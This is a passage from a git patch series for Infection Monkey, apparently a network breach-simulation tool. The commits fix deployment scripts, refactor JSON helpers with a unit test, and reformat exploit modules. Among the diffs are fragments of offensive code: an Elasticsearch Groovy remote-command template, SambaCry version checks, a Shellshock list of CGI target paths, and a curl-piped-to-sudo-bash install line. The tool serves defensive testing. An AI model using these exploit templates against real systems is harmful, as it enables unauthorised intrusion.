-c -N -P ${MONKEY_BIN_DIR} ${SAMBACRY_32_BINARY_URL} # Download traceroute binaries -log_message "Downloading tracerout binaries" +log_message "Downloading traceroute binaries" wget -c -N -P ${MONKEY_BIN_DIR} ${TRACEROUTE_64_BINARY_URL} wget -c -N -P ${MONKEY_BIN_DIR} ${TRACEROUTE_32_BINARY_URL} diff --git a/monkey/monkey_island/linux/run.sh b/monkey/monkey_island/linux/run.sh index 26d8c3234..dc1a266de 100644 --- a/monkey/monkey_island/linux/run.sh +++ b/monkey/monkey_island/linux/run.sh @@ -12,5 +12,5 @@ if [[ `python3.7 --version 2>&1` == *"Python 3.7"* ]]; then python_cmd="python3.7" fi -./bin/mongodb/bin/mongod --dbpath ./bin/mongodb/db -${python_cmd} monkey_island.py +./monkey_island/bin/mongodb/bin/mongod --dbpath ./monkey_island/bin/mongodb/db +${python_cmd} ./monkey_island.py diff --git a/monkey/monkey_island/readme.txt b/monkey/monkey_island/readme.txt index 956892e23..16bcabf0e 100644 --- a/monkey/monkey_island/readme.txt +++ b/monkey/monkey_island/readme.txt @@ -22,7 +22,7 @@ How to set up the Monkey Island server: OR 3.b. Use already running instance of mongodb 3.b.1. Run 'set MONKEY_MONGO_URL="mongodb://:27017/monkeyisland"'. Replace '' with address of mongo server - + 4. Place portable version of OpenSSL 4.1. Download from: https://indy.fulgan.com/SSL/Archive/openssl-1.0.2l-i386-win32.zip 4.2. Extract content from bin folder to monkey_island\bin\openssl @@ -56,7 +56,7 @@ How to run: 2. Install the packages from monkey_island/requirements.txt: sudo python -m pip install -r /var/monkey_island/requirements.txt If pip is not installed, install the python-pip package. Make sure the server is running Python 2.7 and not Python 3+. - + 3. put monkey binaries in /var/monkey_island/cc/binaries monkey-linux-64 - monkey binary for linux 64bit monkey-linux-32 - monkey binary for linux 32bit @@ -81,11 +81,11 @@ How to run: 8. Install npm 8.1. Download and install from: https://www.npmjs.com/get-npm - + 9. Build Monkey Island frontend 9.1. cd to 'monkey_island/cc/ui' 9.2. run 'npm update' 9.3. run 'npm run dist' - + How to run: -1. run run.sh (located under /linux) +1. When your current working directory is monkey, run run.sh (located under /linux) From 4457cdc0c83082ff14a39eeae9664ba58d9fe100 Mon Sep 17 00:00:00 2001 From: VakarisZ Date: Wed, 23 Oct 2019 15:11:58 +0300 Subject: [PATCH 18/44] re-added deadsnakes ppa, because ubuntu 16 doesn't support py3.7 reps --- deployment_scripts/deploy_linux.sh | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/deployment_scripts/deploy_linux.sh b/deployment_scripts/deploy_linux.sh index 5e191d5fe..d83d24620 100644 --- a/deployment_scripts/deploy_linux.sh +++ b/deployment_scripts/deploy_linux.sh @@ -69,8 +69,8 @@ fi if [[ ${python_cmd} == "" ]]; then log_message "Python 3.7 command not found. Installing python 3.7." - sudo apt-get update - sudo apt-get install python3.7 + sudo add-apt-repository ppa:deadsnakes/ppa + sudo apt install python3.7 log_message "Python 3.7 is now available with command 'python3.7'." python_cmd="python3.7" fi From a305611558d8a079075bd54fbf5f130380373113 Mon Sep 17 00:00:00 2001 From: VakarisZ Date: Thu, 24 Oct 2019 10:02:50 +0300 Subject: [PATCH 19/44] re-added deadsnakes ppa, because ubuntu 16 doesn't support py3.7 reps --- deployment_scripts/deploy_linux.sh | 8 +++++--- monkey/monkey_island/linux/run.sh | 2 +- 2 files changed, 6 insertions(+), 4 deletions(-) diff --git a/deployment_scripts/deploy_linux.sh b/deployment_scripts/deploy_linux.sh index d83d24620..1c0f7221c 100644 --- a/deployment_scripts/deploy_linux.sh +++ b/deployment_scripts/deploy_linux.sh @@ -118,10 +118,13 @@ sudo apt-get install openssl # Generate SSL certificate log_message "Generating certificate" -sudo chmod +x ${ISLAND_PATH}/linux/create_certificate.sh || handle_error -${ISLAND_PATH}/linux/create_certificate.sh || handle_error +cd ${ISLAND_PATH} +openssl genrsa -out cc/server.key 2048 +openssl req -new -key cc/server.key -out cc/server.csr -subj "/C=GB/ST=London/L=London/O=Global Security/OU=Monkey Department/CN=monkey.com" +openssl x509 -req -days 366 -in cc/server.csr -signkey cc/server.key -out cc/server.crt # Update node +cd "$ISLAND_PATH/cc/ui" || handle_error log_message "Installing nodejs" sudo apt-get install -y nodejs @@ -131,7 +134,6 @@ sudo apt-get install npm npm update log_message "Generating front end" -cd "$ISLAND_PATH/cc/ui" || handle_error npm run dist # Making dir for binaries diff --git a/monkey/monkey_island/linux/run.sh b/monkey/monkey_island/linux/run.sh index dc1a266de..54e1cdd65 100644 --- a/monkey/monkey_island/linux/run.sh +++ b/monkey/monkey_island/linux/run.sh @@ -12,5 +12,5 @@ if [[ `python3.7 --version 2>&1` == *"Python 3.7"* ]]; then python_cmd="python3.7" fi -./monkey_island/bin/mongodb/bin/mongod --dbpath ./monkey_island/bin/mongodb/db +./monkey_island/bin/mongodb/bin/mongod --dbpath ./monkey_island/bin/mongodb/db & ${python_cmd} ./monkey_island.py From 222b9432e8b412b560cc617127eb1fc8c52f2e77 Mon Sep 17 00:00:00 2001 From: VakarisZ Date: Thu, 24 Oct 2019 11:17:10 +0300 Subject: [PATCH 20/44] fixed front end dependencies --- deployment_scripts/deploy_linux.sh | 8 +++----- monkey/monkey_island/readme.txt | 2 +- 2 files changed, 4 insertions(+), 6 deletions(-) diff --git a/deployment_scripts/deploy_linux.sh b/deployment_scripts/deploy_linux.sh index 1c0f7221c..488911f15 100644 --- a/deployment_scripts/deploy_linux.sh +++ b/deployment_scripts/deploy_linux.sh @@ -124,13 +124,11 @@ openssl req -new -key cc/server.key -out cc/server.csr -subj "/C=GB/ST=London/L= openssl x509 -req -days 366 -in cc/server.csr -signkey cc/server.key -out cc/server.crt # Update node -cd "$ISLAND_PATH/cc/ui" || handle_error log_message "Installing nodejs" +cd "$ISLAND_PATH/cc/ui" || handle_error +curl -sL https://deb.nodesource.com/setup_12.x | sudo -E bash - sudo apt-get install -y nodejs - -# Install npm -log_message "Installing npm" -sudo apt-get install npm +npm install sass-loader node-sass webpack --save-dev npm update log_message "Generating front end" diff --git a/monkey/monkey_island/readme.txt b/monkey/monkey_island/readme.txt index 16bcabf0e..87b2f8c40 100644 --- a/monkey/monkey_island/readme.txt +++ b/monkey/monkey_island/readme.txt @@ -88,4 +88,4 @@ How to run: 9.3. run 'npm run dist' How to run: -1. When your current working directory is monkey, run run.sh (located under /linux) +1. When your current working directory is monkey, run ./monkey_island/linux/run.sh (located under /linux) From 1c32ef156a5283ecb733031e14991252bd978f49 Mon Sep 17 00:00:00 2001 From: VakarisZ Date: Thu, 24 Oct 2019 12:54:00 +0300 Subject: [PATCH 21/44] Improved linux deployment instructions --- deployment_scripts/README.md | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/deployment_scripts/README.md b/deployment_scripts/README.md index 0faf95a52..f69a48b77 100644 --- a/deployment_scripts/README.md +++ b/deployment_scripts/README.md @@ -13,10 +13,11 @@ Don't forget to add python to PATH or do so while installing it via this script. ## Linux +Linux deployment script is meant for Ubuntu 16.x machines. You must have root permissions, but don't run the script as root.
Launch deploy_linux.sh from scripts directory.
-First argument should be an empty directory (script can create one, default is ./infection_monkey) and second is the branch you want to clone (develop by default). -Choose a directory where you have all the relevant permissions and give it's absolute path, for e.g. /home/your_username +First argument should be an absolute path of an empty directory (script will create one if doesn't exist, default is ./infection_monkey). +Second parameter is the branch you want to clone (develop by default). Example usages:
./deploy_linux.sh (deploys under ./infection_monkey)
./deploy_linux.sh "/home/test/monkey" (deploys under /home/test/monkey)
From 348a74361977a67ebb8eca62fb1a90923302ca82 Mon Sep 17 00:00:00 2001 From: Shay Nehmad Date: Mon, 28 Oct 2019 10:28:40 +0200 Subject: [PATCH 22/44] Extracted api representations hooks to separate file, added UT, and fixed linter issue use `x not in y` instead of `not x in y`. --- monkey/monkey_island/cc/app.py | 32 +---------- .../cc/resources/representations.py | 31 +++++++++++ .../cc/resources/representations_test.py | 53 +++++++++++++++++++ 3 files changed, 86 insertions(+), 30 deletions(-) create mode 100644 monkey/monkey_island/cc/resources/representations.py create mode 100644 monkey/monkey_island/cc/resources/representations_test.py diff --git a/monkey/monkey_island/cc/app.py b/monkey/monkey_island/cc/app.py index 38af31bde..8ab61c895 100644 --- a/monkey/monkey_island/cc/app.py +++ b/monkey/monkey_island/cc/app.py @@ -1,11 +1,8 @@ import os import uuid -from datetime import datetime -import bson import flask_restful -from bson.json_util import dumps -from flask import Flask, send_from_directory, make_response, Response +from flask import Flask, send_from_directory, Response from werkzeug.exceptions import NotFound from monkey_island.cc.auth import init_jwt @@ -24,6 +21,7 @@ from monkey_island.cc.resources.netmap import NetMap from monkey_island.cc.resources.node import Node from monkey_island.cc.resources.remote_run import RemoteRun from monkey_island.cc.resources.reporting.report import Report +from monkey_island.cc.resources.representations import output_json from monkey_island.cc.resources.root import Root from monkey_island.cc.resources.telemetry import Telemetry from monkey_island.cc.resources.telemetry_feed import TelemetryFeed @@ -62,32 +60,6 @@ def serve_home(): return serve_static_file(HOME_FILE) -def normalize_obj(obj): - if '_id' in obj and not 'id' in obj: - obj['id'] = obj['_id'] - del obj['_id'] - - for key, value in list(obj.items()): - if isinstance(value, bson.objectid.ObjectId): - obj[key] = str(value) - if isinstance(value, datetime): - obj[key] = str(value) - if isinstance(value, dict): - obj[key] = normalize_obj(value) - if isinstance(value, list): - for i in range(0, len(value)): - if isinstance(value[i], dict): - value[i] = normalize_obj(value[i]) - return obj - - -def output_json(obj, code, headers=None): - obj = normalize_obj(obj) - resp = make_response(dumps(obj), code) - resp.headers.extend(headers or {}) - return resp - - def init_app_config(app, mongo_url): app.config['MONGO_URI'] = mongo_url app.config['SECRET_KEY'] = str(uuid.getnode()) diff --git a/monkey/monkey_island/cc/resources/representations.py b/monkey/monkey_island/cc/resources/representations.py new file mode 100644 index 000000000..cd804db50 --- /dev/null +++ b/monkey/monkey_island/cc/resources/representations.py @@ -0,0 +1,31 @@ +from datetime import datetime + +import bson +from bson.json_util import dumps +from flask import make_response + + +def normalize_obj(obj): + if ('_id' in obj) and ('id' not in obj): + obj['id'] = obj['_id'] + del obj['_id'] + + for key, value in list(obj.items()): + if isinstance(value, bson.objectid.ObjectId): + obj[key] = str(value) + if isinstance(value, datetime): + obj[key] = str(value) + if isinstance(value, dict): + obj[key] = normalize_obj(value) + if isinstance(value, list): + for i in range(0, len(value)): + if isinstance(value[i], dict): + value[i] = normalize_obj(value[i]) + return obj + + +def output_json(obj, code, headers=None): + obj = normalize_obj(obj) + resp = make_response(dumps(obj), code) + resp.headers.extend(headers or {}) + return resp diff --git a/monkey/monkey_island/cc/resources/representations_test.py b/monkey/monkey_island/cc/resources/representations_test.py new file mode 100644 index 000000000..714c70ed2 --- /dev/null +++ b/monkey/monkey_island/cc/resources/representations_test.py @@ -0,0 +1,53 @@ +from unittest import TestCase +from datetime import datetime +from .representations import normalize_obj + +import bson + + +class TestJsonRepresentations(TestCase): + def test_normalize_obj(self): + # empty + self.assertEqual({}, normalize_obj({})) + + # no special content + self.assertEqual( + {"a": "a"}, + normalize_obj({"a": "a"}) + ) + + # _id field -> id field + self.assertEqual( + {"id": 12345}, + normalize_obj({"_id": 12345}) + ) + + # obj id field -> str + obj_id_str = "123456789012345678901234" + self.assertEqual( + {"id": obj_id_str}, + normalize_obj({"_id": bson.objectid.ObjectId(obj_id_str)}) + ) + + # datetime -> str + dt = datetime.now() + expected = {"a": str(dt)} + result = normalize_obj({"a": dt}) + self.assertEqual(expected, result) + + # dicts and lists + self.assertEqual({ + "a": [ + {"ba": obj_id_str, + "bb": obj_id_str} + ], + "b": {"id": obj_id_str} + }, + normalize_obj({ + "a": [ + {"ba": bson.objectid.ObjectId(obj_id_str), + "bb": bson.objectid.ObjectId(obj_id_str)} + ], + "b": {"_id": bson.objectid.ObjectId(obj_id_str)} + }) + ) From d6544c9e03f29338c2a97d7808204a9a0424bb11 Mon Sep 17 00:00:00 2001 From: Shay Nehmad Date: Mon, 28 Oct 2019 12:59:32 +0200 Subject: [PATCH 23/44] Whitespace PEP8 fixes --- monkey/infection_monkey/exploit/__init__.py | 12 ++++++------ monkey/monkey_island/cc/services/__init__.py | 2 +- 2 files changed, 7 insertions(+), 7 deletions(-) diff --git a/monkey/infection_monkey/exploit/__init__.py b/monkey/infection_monkey/exploit/__init__.py index 9e899b140..e2b75a4dd 100644 --- a/monkey/infection_monkey/exploit/__init__.py +++ b/monkey/infection_monkey/exploit/__init__.py @@ -20,11 +20,11 @@ class HostExploiter(object, metaclass=ABCMeta): def __init__(self, host): self._config = infection_monkey.config.WormConfiguration self.exploit_info = {'display_name': self._EXPLOITED_SERVICE, - 'started': '', - 'finished': '', - 'vulnerable_urls': [], - 'vulnerable_ports': [], - 'executed_cmds': []} + 'started': '', + 'finished': '', + 'vulnerable_urls': [], + 'vulnerable_ports': [], + 'executed_cmds': []} self.exploit_attempts = [] self.host = host @@ -43,7 +43,7 @@ class HostExploiter(object, metaclass=ABCMeta): def report_login_attempt(self, result, user, password='', lm_hash='', ntlm_hash='', ssh_key=''): self.exploit_attempts.append({'result': result, 'user': user, 'password': password, - 'lm_hash': lm_hash, 'ntlm_hash': ntlm_hash, 'ssh_key': ssh_key}) + 'lm_hash': lm_hash, 'ntlm_hash': ntlm_hash, 'ssh_key': ssh_key}) def exploit_host(self): self.pre_exploit() diff --git a/monkey/monkey_island/cc/services/__init__.py b/monkey/monkey_island/cc/services/__init__.py index 142e51368..ee5b79ad0 100644 --- a/monkey/monkey_island/cc/services/__init__.py +++ b/monkey/monkey_island/cc/services/__init__.py @@ -1 +1 @@ -__author__ = 'itay.mizeretz' \ No newline at end of file +__author__ = 'itay.mizeretz' From cd3835a42e1bdf178f9f671fdc8e081eb7c1030f Mon Sep 17 00:00:00 2001 From: Shay Nehmad Date: Mon, 28 Oct 2019 16:14:52 +0200 Subject: [PATCH 24/44] Whitespace and imports fixes --- monkey/common/cloud/aws_instance.py | 4 +- monkey/common/cmd/aws/aws_cmd_runner.py | 2 +- monkey/common/data/zero_trust_consts.py | 30 +- monkey/common/utils/code_utils.py | 2 + .../infection_monkey/exploit/elasticgroovy.py | 6 +- monkey/infection_monkey/exploit/sambacry.py | 19 +- .../exploit/shellshock_resources.py | 808 +++++++++--------- monkey/infection_monkey/exploit/struts2.py | 7 +- .../exploit/tools/http_tools.py | 8 +- monkey/infection_monkey/exploit/wmiexec.py | 3 +- monkey/infection_monkey/main.py | 9 +- monkey/infection_monkey/model/__init__.py | 9 +- monkey/infection_monkey/monkeyfs.py | 1 - monkey/infection_monkey/network/firewall.py | 7 +- monkey/infection_monkey/network/httpfinger.py | 2 +- .../infection_monkey/network/ping_scanner.py | 15 +- monkey/infection_monkey/network/smbfinger.py | 10 +- .../infection_monkey/network/tcp_scanner.py | 3 +- .../system_info/SSH_info_collector.py | 2 +- monkey/infection_monkey/transport/base.py | 2 +- monkey/monkey_island/cc/models/test_monkey.py | 2 +- monkey/monkey_island/cc/resources/root.py | 8 +- .../cc/services/attack/attack_report.py | 5 +- monkey/monkey_island/cc/services/config.py | 15 +- .../cc/services/remote_run_aws.py | 2 +- .../cc/services/reporting/aws_exporter.py | 107 ++- .../cc/services/reporting/pth_report.py | 21 +- monkey/monkey_island/cc/utils.py | 11 +- 28 files changed, 593 insertions(+), 527 deletions(-) diff --git a/monkey/common/cloud/aws_instance.py b/monkey/common/cloud/aws_instance.py index ac4fe633e..5178b0938 100644 --- a/monkey/common/cloud/aws_instance.py +++ b/monkey/common/cloud/aws_instance.py @@ -29,8 +29,8 @@ class AwsInstance(object): self.instance_id = urllib.request.urlopen( AWS_LATEST_METADATA_URI_PREFIX + 'meta-data/instance-id', timeout=2).read().decode() self.region = self._parse_region( - urllib.request.urlopen(AWS_LATEST_METADATA_URI_PREFIX + 'meta-data/placement/availability-zone').read(). - decode()) + urllib.request.urlopen( + AWS_LATEST_METADATA_URI_PREFIX + 'meta-data/placement/availability-zone').read().decode()) except (urllib.error.URLError, IOError) as e: logger.debug("Failed init of AwsInstance while getting metadata: {}".format(e)) diff --git a/monkey/common/cmd/aws/aws_cmd_runner.py b/monkey/common/cmd/aws/aws_cmd_runner.py index 9745d2c1d..459a42129 100644 --- a/monkey/common/cmd/aws/aws_cmd_runner.py +++ b/monkey/common/cmd/aws/aws_cmd_runner.py @@ -15,7 +15,7 @@ class AwsCmdRunner(CmdRunner): Class for running commands on a remote AWS machine """ - def __init__(self, is_linux, instance_id, region = None): + def __init__(self, is_linux, instance_id, region=None): super(AwsCmdRunner, self).__init__(is_linux) self.instance_id = instance_id self.region = region diff --git a/monkey/common/data/zero_trust_consts.py b/monkey/common/data/zero_trust_consts.py index 5ac5dd78d..ae27b1c35 100644 --- a/monkey/common/data/zero_trust_consts.py +++ b/monkey/common/data/zero_trust_consts.py @@ -68,7 +68,8 @@ FINDING_EXPLANATION_BY_STATUS_KEY = "finding_explanation" TEST_EXPLANATION_KEY = "explanation" TESTS_MAP = { TEST_SEGMENTATION: { - TEST_EXPLANATION_KEY: "The Monkey tried to scan and find machines that it can communicate with from the machine it's running on, that belong to different network segments.", + TEST_EXPLANATION_KEY: "The Monkey tried to scan and find machines that it can communicate with from the machine it's " + "running on, that belong to different network segments.", FINDING_EXPLANATION_BY_STATUS_KEY: { STATUS_FAILED: "Monkey performed cross-segment communication. Check firewall rules and logs.", STATUS_PASSED: "Monkey couldn't perform cross-segment communication. If relevant, check firewall logs." @@ -78,7 +79,8 @@ TESTS_MAP = { POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_PASSED, STATUS_FAILED] }, TEST_MALICIOUS_ACTIVITY_TIMELINE: { - TEST_EXPLANATION_KEY: "The Monkeys in the network performed malicious-looking actions, like scanning and attempting exploitation.", + TEST_EXPLANATION_KEY: "The Monkeys in the network performed malicious-looking actions, like scanning and attempting " + "exploitation.", FINDING_EXPLANATION_BY_STATUS_KEY: { STATUS_VERIFY: "Monkey performed malicious actions in the network. Check SOC logs and alerts." }, @@ -89,8 +91,10 @@ TESTS_MAP = { TEST_ENDPOINT_SECURITY_EXISTS: { TEST_EXPLANATION_KEY: "The Monkey checked if there is an active process of an endpoint security software.", FINDING_EXPLANATION_BY_STATUS_KEY: { - STATUS_FAILED: "Monkey didn't find ANY active endpoint security processes. Install and activate anti-virus software on endpoints.", - STATUS_PASSED: "Monkey found active endpoint security processes. Check their logs to see if Monkey was a security concern." + STATUS_FAILED: "Monkey didn't find ANY active endpoint security processes. Install and activate anti-virus " + "software on endpoints.", + STATUS_PASSED: "Monkey found active endpoint security processes. Check their logs to see if Monkey was a " + "security concern. " }, PRINCIPLE_KEY: PRINCIPLE_ENDPOINT_SECURITY, PILLARS_KEY: [DEVICES], @@ -99,7 +103,8 @@ TESTS_MAP = { TEST_MACHINE_EXPLOITED: { TEST_EXPLANATION_KEY: "The Monkey tries to exploit machines in order to breach them and propagate in the network.", FINDING_EXPLANATION_BY_STATUS_KEY: { - STATUS_FAILED: "Monkey successfully exploited endpoints. Check IDS/IPS logs to see activity recognized and see which endpoints were compromised.", + STATUS_FAILED: "Monkey successfully exploited endpoints. Check IDS/IPS logs to see activity recognized and see " + "which endpoints were compromised.", STATUS_PASSED: "Monkey didn't manage to exploit an endpoint." }, PRINCIPLE_KEY: PRINCIPLE_ENDPOINT_SECURITY, @@ -109,7 +114,8 @@ TESTS_MAP = { TEST_SCHEDULED_EXECUTION: { TEST_EXPLANATION_KEY: "The Monkey was executed in a scheduled manner.", FINDING_EXPLANATION_BY_STATUS_KEY: { - STATUS_VERIFY: "Monkey was executed in a scheduled manner. Locate this activity in User-Behavior security software.", + STATUS_VERIFY: "Monkey was executed in a scheduled manner. Locate this activity in User-Behavior security " + "software.", STATUS_PASSED: "Monkey failed to execute in a scheduled manner." }, PRINCIPLE_KEY: PRINCIPLE_USER_BEHAVIOUR, @@ -120,7 +126,8 @@ TESTS_MAP = { TEST_EXPLANATION_KEY: "The Monkey scanned for unencrypted access to ElasticSearch instances.", FINDING_EXPLANATION_BY_STATUS_KEY: { STATUS_FAILED: "Monkey accessed ElasticSearch instances. Limit access to data by encrypting it in in-transit.", - STATUS_PASSED: "Monkey didn't find open ElasticSearch instances. If you have such instances, look for alerts that indicate attempts to access them." + STATUS_PASSED: "Monkey didn't find open ElasticSearch instances. If you have such instances, look for alerts " + "that indicate attempts to access them. " }, PRINCIPLE_KEY: PRINCIPLE_DATA_TRANSIT, PILLARS_KEY: [DATA], @@ -130,7 +137,8 @@ TESTS_MAP = { TEST_EXPLANATION_KEY: "The Monkey scanned for unencrypted access to HTTP servers.", FINDING_EXPLANATION_BY_STATUS_KEY: { STATUS_FAILED: "Monkey accessed HTTP servers. Limit access to data by encrypting it in in-transit.", - STATUS_PASSED: "Monkey didn't find open HTTP servers. If you have such servers, look for alerts that indicate attempts to access them." + STATUS_PASSED: "Monkey didn't find open HTTP servers. If you have such servers, look for alerts that indicate " + "attempts to access them. " }, PRINCIPLE_KEY: PRINCIPLE_DATA_TRANSIT, PILLARS_KEY: [DATA], @@ -139,7 +147,8 @@ TESTS_MAP = { TEST_TUNNELING: { TEST_EXPLANATION_KEY: "The Monkey tried to tunnel traffic using other monkeys.", FINDING_EXPLANATION_BY_STATUS_KEY: { - STATUS_FAILED: "Monkey tunneled its traffic using other monkeys. Your network policies are too permissive - restrict them." + STATUS_FAILED: "Monkey tunneled its traffic using other monkeys. Your network policies are too permissive - " + "restrict them. " }, PRINCIPLE_KEY: PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES, PILLARS_KEY: [NETWORKS, VISIBILITY_ANALYTICS], @@ -148,7 +157,8 @@ TESTS_MAP = { TEST_COMMUNICATE_AS_NEW_USER: { TEST_EXPLANATION_KEY: "The Monkey tried to create a new user and communicate with the internet from it.", FINDING_EXPLANATION_BY_STATUS_KEY: { - STATUS_FAILED: "Monkey caused a new user to access the network. Your network policies are too permissive - restrict them to MAC only.", + STATUS_FAILED: "Monkey caused a new user to access the network. Your network policies are too permissive - " + "restrict them to MAC only.", STATUS_PASSED: "Monkey wasn't able to cause a new user to access the network." }, PRINCIPLE_KEY: PRINCIPLE_USERS_MAC_POLICIES, diff --git a/monkey/common/utils/code_utils.py b/monkey/common/utils/code_utils.py index d6d407706..b50e01fb0 100644 --- a/monkey/common/utils/code_utils.py +++ b/monkey/common/utils/code_utils.py @@ -1,10 +1,12 @@ # abstract, static method decorator +# noinspection PyPep8Naming class abstractstatic(staticmethod): __slots__ = () def __init__(self, function): super(abstractstatic, self).__init__(function) function.__isabstractmethod__ = True + __isabstractmethod__ = True diff --git a/monkey/infection_monkey/exploit/elasticgroovy.py b/monkey/infection_monkey/exploit/elasticgroovy.py index f1057f2dd..c8f897dd2 100644 --- a/monkey/infection_monkey/exploit/elasticgroovy.py +++ b/monkey/infection_monkey/exploit/elasticgroovy.py @@ -26,8 +26,8 @@ class ElasticGroovyExploiter(WebRCE): # attack URLs MONKEY_RESULT_FIELD = "monkey_result" GENERIC_QUERY = '''{"size":1, "script_fields":{"%s": {"script": "%%s"}}}''' % MONKEY_RESULT_FIELD - JAVA_CMD = GENERIC_QUERY \ - % """java.lang.Math.class.forName(\\"java.lang.Runtime\\").getRuntime().exec(\\"%s\\").getText()""" + JAVA_CMD = \ + GENERIC_QUERY % """java.lang.Math.class.forName(\\"java.lang.Runtime\\").getRuntime().exec(\\"%s\\").getText()""" _TARGET_OS_TYPE = ['linux', 'windows'] _EXPLOITED_SERVICE = 'Elastic search' @@ -39,7 +39,7 @@ class ElasticGroovyExploiter(WebRCE): exploit_config = super(ElasticGroovyExploiter, self).get_exploit_config() exploit_config['dropper'] = True exploit_config['url_extensions'] = ['_search?pretty'] - exploit_config['upload_commands'] = {'linux': WGET_HTTP_UPLOAD, 'windows': CMD_PREFIX +" " + BITSADMIN_CMDLINE_HTTP} + exploit_config['upload_commands'] = {'linux': WGET_HTTP_UPLOAD, 'windows': CMD_PREFIX + " " + BITSADMIN_CMDLINE_HTTP} return exploit_config def get_open_service_ports(self, port_list, names): diff --git a/monkey/infection_monkey/exploit/sambacry.py b/monkey/infection_monkey/exploit/sambacry.py index e48a21616..3c12ab843 100644 --- a/monkey/infection_monkey/exploit/sambacry.py +++ b/monkey/infection_monkey/exploit/sambacry.py @@ -230,13 +230,13 @@ class SambaCryExploiter(HostExploiter): elif (samba_version_parts[0] == "4") and (samba_version_parts[1] <= "3"): is_vulnerable = True elif (samba_version_parts[0] == "4") and (samba_version_parts[1] == "4") and ( - samba_version_parts[1] <= "13"): + samba_version_parts[1] <= "13"): is_vulnerable = True elif (samba_version_parts[0] == "4") and (samba_version_parts[1] == "5") and ( - samba_version_parts[1] <= "9"): + samba_version_parts[1] <= "9"): is_vulnerable = True elif (samba_version_parts[0] == "4") and (samba_version_parts[1] == "6") and ( - samba_version_parts[1] <= "3"): + samba_version_parts[1] <= "3"): is_vulnerable = True else: # If pattern doesn't match we can't tell what version it is. Better try @@ -448,7 +448,12 @@ class SambaCryExploiter(HostExploiter): return smb_client.getSMBServer().nt_create_andx(treeId, pathName, cmd=ntCreate) else: - return SambaCryExploiter.create_smb(smb_client, treeId, pathName, desiredAccess=FILE_READ_DATA, - shareMode=FILE_SHARE_READ, - creationOptions=FILE_OPEN, creationDisposition=FILE_NON_DIRECTORY_FILE, - fileAttributes=0) + return SambaCryExploiter.create_smb( + smb_client, + treeId, + pathName, + desiredAccess=FILE_READ_DATA, + shareMode=FILE_SHARE_READ, + creationOptions=FILE_OPEN, + creationDisposition=FILE_NON_DIRECTORY_FILE, + fileAttributes=0) diff --git a/monkey/infection_monkey/exploit/shellshock_resources.py b/monkey/infection_monkey/exploit/shellshock_resources.py index 10cfc75a6..46851dde1 100644 --- a/monkey/infection_monkey/exploit/shellshock_resources.py +++ b/monkey/infection_monkey/exploit/shellshock_resources.py @@ -1,406 +1,408 @@ # resource for shellshock attack # copied and transformed from https://github.com/nccgroup/shocker/blob/master/shocker-cgi_list -CGI_FILES = (r'/', - r'/admin.cgi', - r'/administrator.cgi', - r'/agora.cgi', - r'/aktivate/cgi-bin/catgy.cgi', - r'/analyse.cgi', - r'/apps/web/vs_diag.cgi', - r'/axis-cgi/buffer/command.cgi', - r'/b2-include/b2edit.showposts.php', - r'/bandwidth/index.cgi', - r'/bigconf.cgi', - r'/cartcart.cgi', - r'/cart.cgi', - r'/ccbill/whereami.cgi', - r'/cgi-bin/14all-1.1.cgi', - r'/cgi-bin/14all.cgi', - r'/cgi-bin/a1disp3.cgi', - r'/cgi-bin/a1stats/a1disp3.cgi', - r'/cgi-bin/a1stats/a1disp4.cgi', - r'/cgi-bin/addbanner.cgi', - r'/cgi-bin/add_ftp.cgi', - r'/cgi-bin/adduser.cgi', - r'/cgi-bin/admin/admin.cgi', - r'/cgi-bin/admin.cgi', - r'/cgi-bin/admin/getparam.cgi', - r'/cgi-bin/adminhot.cgi', - r'/cgi-bin/admin.pl', - r'/cgi-bin/admin/setup.cgi', - r'/cgi-bin/adminwww.cgi', - r'/cgi-bin/af.cgi', - r'/cgi-bin/aglimpse.cgi', - r'/cgi-bin/alienform.cgi', - r'/cgi-bin/AnyBoard.cgi', - r'/cgi-bin/architext_query.cgi', - r'/cgi-bin/astrocam.cgi', - r'/cgi-bin/AT-admin.cgi', - r'/cgi-bin/AT-generate.cgi', - r'/cgi-bin/auction/auction.cgi', - r'/cgi-bin/auktion.cgi', - r'/cgi-bin/ax-admin.cgi', - r'/cgi-bin/ax.cgi', - r'/cgi-bin/axs.cgi', - r'/cgi-bin/badmin.cgi', - r'/cgi-bin/banner.cgi', - r'/cgi-bin/bannereditor.cgi', - r'/cgi-bin/bb-ack.sh', - r'/cgi-bin/bb-histlog.sh', - r'/cgi-bin/bb-hist.sh', - r'/cgi-bin/bb-hostsvc.sh', - r'/cgi-bin/bb-replog.sh', - r'/cgi-bin/bb-rep.sh', - r'/cgi-bin/bbs_forum.cgi', - r'/cgi-bin/bigconf.cgi', - r'/cgi-bin/bizdb1-search.cgi', - r'/cgi-bin/blog/mt-check.cgi', - r'/cgi-bin/blog/mt-load.cgi', - r'/cgi-bin/bnbform.cgi', - r'/cgi-bin/book.cgi', - r'/cgi-bin/boozt/admin/index.cgi', - r'/cgi-bin/bsguest.cgi', - r'/cgi-bin/bslist.cgi', - r'/cgi-bin/build.cgi', - r'/cgi-bin/bulk/bulk.cgi', - r'/cgi-bin/cached_feed.cgi', - r'/cgi-bin/cachemgr.cgi', - r'/cgi-bin/calendar/index.cgi', - r'/cgi-bin/cartmanager.cgi', - r'/cgi-bin/cbmc/forums.cgi', - r'/cgi-bin/ccvsblame.cgi', - r'/cgi-bin/c_download.cgi', - r'/cgi-bin/cgforum.cgi', - r'/cgi-bin/.cgi', - r'/cgi-bin/cgi_process', - r'/cgi-bin/classified.cgi', - r'/cgi-bin/classifieds.cgi', - r'/cgi-bin/classifieds/classifieds.cgi', - r'/cgi-bin/classifieds/index.cgi', - r'/cgi-bin/.cobalt/alert/service.cgi', - r'/cgi-bin/.cobalt/message/message.cgi', - r'/cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi', - r'/cgi-bin/commandit.cgi', - r'/cgi-bin/commerce.cgi', - r'/cgi-bin/common/listrec.pl', - r'/cgi-bin/compatible.cgi', - r'/cgi-bin/Count.cgi', - r'/cgi-bin/csChatRBox.cgi', - r'/cgi-bin/csGuestBook.cgi', - r'/cgi-bin/csLiveSupport.cgi', - r'/cgi-bin/CSMailto.cgi', - r'/cgi-bin/CSMailto/CSMailto.cgi', - r'/cgi-bin/csNews.cgi', - r'/cgi-bin/csNewsPro.cgi', - r'/cgi-bin/csPassword.cgi', - r'/cgi-bin/csPassword/csPassword.cgi', - r'/cgi-bin/csSearch.cgi', - 